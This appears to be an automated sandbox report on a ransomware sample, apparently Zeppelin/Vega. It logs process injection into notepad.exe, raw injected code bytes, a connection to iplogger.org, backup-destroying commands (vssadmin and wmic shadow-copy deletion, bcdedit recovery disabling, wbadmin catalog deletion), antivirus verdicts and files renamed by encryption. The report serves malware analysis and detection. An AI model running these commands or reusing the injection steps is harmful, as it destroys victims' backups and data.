process_handle: 0x000004f8
1 0 0

NtAllocateVirtualMemory

process_identifier: 492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00110000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f8
1 0 0
Time & API Arguments Status Return Repeated

InternetConnectA

username:
service: 3
hostname: iplogger.org
internet_handle: 0x00cc0004
flags: 0
password:
port: 80
1 13369352 0

HttpOpenRequestA

connect_handle: 0x00cc0008
http_version:
flags: 3
http_method: GET
referer:
path: 1L3ig7.gz
1 13369356 0
Process injection Process 2072 injected into non-child 492
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: C:\Users\test22\AppData\Local\Temp\pattern.exe
base_address: 0x000f0000
process_identifier: 492
process_handle: 0x000004f8
1 1 0

WriteProcessMemory

buffer: ³‰suzsuÿsu
base_address: 0x00100000
process_identifier: 492
process_handle: 0x000004f8
1 1 0

WriteProcessMemory

buffer: U‹ìƒÄðVW‹E‹ð}𥥥¥hèÿUøÿuüÿUðƒøtíhÎú­ÞÿUô_^‹å]U‹ìƒÄØSVW3҉U؉U܉Uà‰Uü‹Ø3ÀUhiÐBdÿ0d‰ …Û„7U฀ÐBèÔ2þÿ‹Eàè|ýÿPh¬ÐBèuœýÿPèwœýÿ‰EäUܸÄÐBè«2þÿ‹EÜèg|ýÿPh¬ÐBèLœýÿPèNœýÿ‰EèUظøÐBè‚2þÿ‹EØè>|ýÿPh¬ÐBè#œýÿPè%œýÿ‰EìUü3Àè4)þÿj@h0‹Eüè}€ýÿÀ@PjSèݜýÿ‹ð‰uðEøP‹Eüè`€ýÿÀ@P‹EüèD€ýÿPVSèØœýÿj@h0jjS觜ýÿ‹ðEøPjEäPVS贜ýÿƒ}øuHj@h0hôjSèzœýÿ‹øEøPhôh¨ÎBWS胜ýÿ}øôuEôPjVWjjSè8šýÿ…À3ÀZYYd‰hpÐBEغè wýÿEüè~ýÿÃéŽoýÿëã_^[‹å]Ãÿÿÿÿ+ÿþücIЉƐ‰ùé®É€ Àz0Ç2· &ÿ¹‚
base_address: 0x00110000
process_identifier: 492
process_handle: 0x000004f8
1 1 0
command "c:\windows\system32\cmd.exe" /c bcdedit /set {default} recoveryenabled no
command "c:\windows\system32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
cmdline vssadmin delete shadows /all /quiet
cmdline wmic shadowcopy delete
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 1204
thread_handle: 0x0000025c
process_identifier: 1456
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000264
1 1 0

ShellExecuteExW

show_type: 1
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe
parameters: -start
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe
1 1 0
cmdline vssadmin delete shadows /all /quiet
cmdline "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000004e4
suspend_count: 1
process_identifier: 2072
1 0 0

CreateProcessInternalW

thread_identifier: 1204
thread_handle: 0x0000025c
process_identifier: 1456
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000264
1 1 0

CreateProcessInternalW

thread_identifier: 1976
thread_handle: 0x000004f8
process_identifier: 492
current_directory:
filepath:
track: 1
command_line: notepad.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217796 (CREATE_NO_WINDOW|CREATE_SUSPENDED|IDLE_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000504
1 1 0

NtAllocateVirtualMemory

process_identifier: 492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f8
1 0 0

WriteProcessMemory

buffer: C:\Users\test22\AppData\Local\Temp\pattern.exe
base_address: 0x000f0000
process_identifier: 492
process_handle: 0x000004f8
1 1 0

NtAllocateVirtualMemory

process_identifier: 492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f8
1 0 0

WriteProcessMemory

buffer: ³‰suzsuÿsu
base_address: 0x00100000
process_identifier: 492
process_handle: 0x000004f8
1 1 0

NtAllocateVirtualMemory

process_identifier: 492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00110000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f8
1 0 0

WriteProcessMemory

buffer: U‹ìƒÄðVW‹E‹ð}𥥥¥hèÿUøÿuüÿUðƒøtíhÎú­ÞÿUô_^‹å]U‹ìƒÄØSVW3҉U؉U܉Uà‰Uü‹Ø3ÀUhiÐBdÿ0d‰ …Û„7U฀ÐBèÔ2þÿ‹Eàè|ýÿPh¬ÐBèuœýÿPèwœýÿ‰EäUܸÄÐBè«2þÿ‹EÜèg|ýÿPh¬ÐBèLœýÿPèNœýÿ‰EèUظøÐBè‚2þÿ‹EØè>|ýÿPh¬ÐBè#œýÿPè%œýÿ‰EìUü3Àè4)þÿj@h0‹Eüè}€ýÿÀ@PjSèݜýÿ‹ð‰uðEøP‹Eüè`€ýÿÀ@P‹EüèD€ýÿPVSèØœýÿj@h0jjS觜ýÿ‹ðEøPjEäPVS贜ýÿƒ}øuHj@h0hôjSèzœýÿ‹øEøPhôh¨ÎBWS胜ýÿ}øôuEôPjVWjjSè8šýÿ…À3ÀZYYd‰hpÐBEغè wýÿEüè~ýÿÃéŽoýÿëã_^[‹å]Ãÿÿÿÿ+ÿþücIЉƐ‰ùé®É€ Àz0Ç2· &ÿ¹‚
base_address: 0x00110000
process_identifier: 492
process_handle: 0x000004f8
1 1 0

NtResumeThread

thread_handle: 0x000002f4
suspend_count: 1
process_identifier: 1456
1 0 0

CreateProcessInternalW

thread_identifier: 2300
thread_handle: 0x00000544
process_identifier: 2884
current_directory: C:\Windows\system32\
filepath:
track: 1
command_line: "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
filepath_r:
stack_pivoted: 0
creation_flags: 48 (CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000054c
1 1 0

CreateProcessInternalW

thread_identifier: 812
thread_handle: 0x00000554
process_identifier: 2944
current_directory: C:\Windows\system32\
filepath:
track: 1
command_line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
filepath_r:
stack_pivoted: 0
creation_flags: 48 (CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000550
1 1 0

CreateProcessInternalW

thread_identifier: 1852
thread_handle: 0x0000055c
process_identifier: 2312
current_directory: C:\Windows\system32\
filepath:
track: 1
command_line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
filepath_r:
stack_pivoted: 0
creation_flags: 48 (CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000558
1 1 0

CreateProcessInternalW

thread_identifier: 2972
thread_handle: 0x00000564
process_identifier: 1080
current_directory: C:\Windows\system32\
filepath:
track: 1
command_line: "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
filepath_r:
stack_pivoted: 0
creation_flags: 48 (CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000560
1 1 0

CreateProcessInternalW

thread_identifier: 2444
thread_handle: 0x0000056c
process_identifier: 3024
current_directory: C:\Windows\system32\
filepath:
track: 1
command_line: "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
filepath_r:
stack_pivoted: 0
creation_flags: 48 (CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000568
1 1 0

CreateProcessInternalW

thread_identifier: 2480
thread_handle: 0x00000574
process_identifier: 2656
current_directory: C:\Windows\system32\
filepath:
track: 1
command_line: "C:\Windows\system32\cmd.exe" /C C:\Users\test22\AppData\Local\Temp\~temp001.bat
filepath_r:
stack_pivoted: 0
creation_flags: 48 (CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000570
1 1 0

CreateProcessInternalW

thread_identifier: 584
thread_handle: 0x0000057c
process_identifier: 1332
current_directory: C:\Users\test22\AppData\Roaming\Microsoft\Windows\
filepath:
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0
filepath_r:
stack_pivoted: 0
creation_flags: 48 (CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000578
1 1 0

CreateProcessInternalW

thread_identifier: 2532
thread_handle: 0x00000084
process_identifier: 1976
current_directory: C:\Windows\system32
filepath: C:\Windows\System32\wbem\WMIC.exe
track: 1
command_line: wmic shadowcopy delete
filepath_r: C:\Windows\System32\Wbem\WMIC.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

thread_identifier: 2560
thread_handle: 0x00000084
process_identifier: 2128
current_directory: C:\Windows\system32
filepath: C:\Windows\System32\vssadmin.exe
track: 1
command_line: vssadmin delete shadows /all /quiet
filepath_r: C:\Windows\system32\vssadmin.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

thread_identifier: 2888
thread_handle: 0x00000084
process_identifier: 2236
current_directory: C:\Windows\system32
filepath: C:\Windows\System32\wbem\WMIC.exe
track: 1
command_line: wmic shadowcopy delete
filepath_r: C:\Windows\System32\Wbem\WMIC.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 2524
thread_handle: 0x0000008c
process_identifier: 808
current_directory: C:\Windows\system32
filepath: C:\Windows\System32\vssadmin.exe
track: 1
command_line: vssadmin delete shadows /all /quiet
filepath_r: C:\Windows\system32\vssadmin.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0
Bkav W32.AIDetect.malware2
Elastic malicious (high confidence)
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
Alibaba Ransom:Win32/generic.ali2000010
CrowdStrike win/malicious_confidence_90% (W)
Cyren W32/FakeAlert.DX.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Generik.HMIXXKV
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky VHO:Trojan-Ransom.Win32.Vega.ax
Avast FileRepMetagen [Malware]
Rising Trojan.Kryptik!1.D62E (CLASSIC)
Comodo TrojWare.Win32.Agent.ztvag@0
McAfee-GW-Edition BehavesLike.Win32.Generic.gm
FireEye Generic.mg.dcef208fcdac3345
Sophos Mal/Generic-R + Mal/EncPk-APW
GData Win32.Trojan-Ransom.Zeppelin.GYYT0B
Webroot W32.Bot.Gen
Kingsoft Win32.Heur.KVMH008.a.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
McAfee Artemis!DCEF208FCDAC
VBA32 BScope.Malware-Cryptor.MTA
Malwarebytes Malware.AI.1126792071
SentinelOne Static AI - Malicious PE
Fortinet W32/Qbot.CV!tr
BitDefenderTheta Gen:NN.ZexaF.34110.AqW@ae6GONai
AVG FileRepMetagen [Malware]
MaxSecure Virus.Patched.OF
file c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\personal\perso051.hwt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\microsoft office\clipart\pub60cor\pe00272_.wmf.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\microsoft office\clipart\pub60cor\j0188667.wmf.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\clipart\m_banner\banner_15.png.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\clipart\m_letter\letter_078.png.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\clipart\m_work\work_43.png.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\lib\bj8hg12f.upp.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\wongo\madang.ini.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\personal\perso196.hwt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\common80\him\hncjpn80.him.kd8eby0.1aa-c28-9d4
file c:\program files\java\jre7\lib\zi\indian\kerguelen.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\microsoft office\office12\1042\msaccess_col.hxt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\draw\ki_games\kgame_24.drt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\fonts\hcjpsegt.hft.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\arch\arch003.hwt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\draw\pl_birthflower\plantb_18.drt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\microsoft office\office12\mysl.ico.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\draw\nt_birthstone\stone_03.drt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\draw\kt_proverb\prove_09.drt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\draw\cp_common\comp2_11.drt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\namecard\name12.hwt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\common80\imgfilters\gs\fonts\a010015l.afm.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\bogun\bogun031.hwt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\clipart\m_school\school_05.png.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\notebook\notebook32.hwt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\lib\pdf_ops.ps.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\common80\imgfilters\gs\gs8.60\resource\cmap\uniks-utf8-v.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\religion\crist35.hwt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\present\presen28.hwt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\draw\bg_picture1\bacg4_06.drt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\microsoft office\clipart\pub60cor\bl00932_.wmf.kd8eby0.1aa-c28-9d4
file C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02091_.WMF
file c:\program files (x86)\hnc\hwp80\hwpobject.tlb.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\clipart\m_textbox\textbox_07.jpg.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\microsoft office\clipart\pub60cor\j0382939.jpg.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\draw\dg_decoarrows\arrod_12.drt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\microsoft office\clipart\pub60cor\j0107290.wmf.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\clipart\ec_science\sci050.png.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\microsoft office\clipart\pub60cor\hh01058_.wmf.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\clipart\m_background\background_28.jpg.kd8eby0.1aa-c28-9d4
file C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE12\AUTOSHAP\BD18234_.WMF
file c:\program files (x86)\hnc\shared80\hwptemplate\draw\ep_common\ballg_23.drt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\clipart\m_decoration\decoration_33.png.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\doc\kor\purchase\purch099.hwt.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\hwptemplate\draw\fg_callouts\line callout4 (no border).drt.kd8eby0.1aa-c28-9d4
file C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\RG_Common\Reli1_05.drt
file C:\Program Files (x86)\Microsoft Office\Office12\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg
file c:\program files (x86)\hnc\shared80\hwptemplate\xml\kor\booksreg.xsd.kd8eby0.1aa-c28-9d4
file c:\program files (x86)\hnc\shared80\clipart\m_work\work_37.png.kd8eby0.1aa-c28-9d4
file C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\MP_Way\RougR_37.drt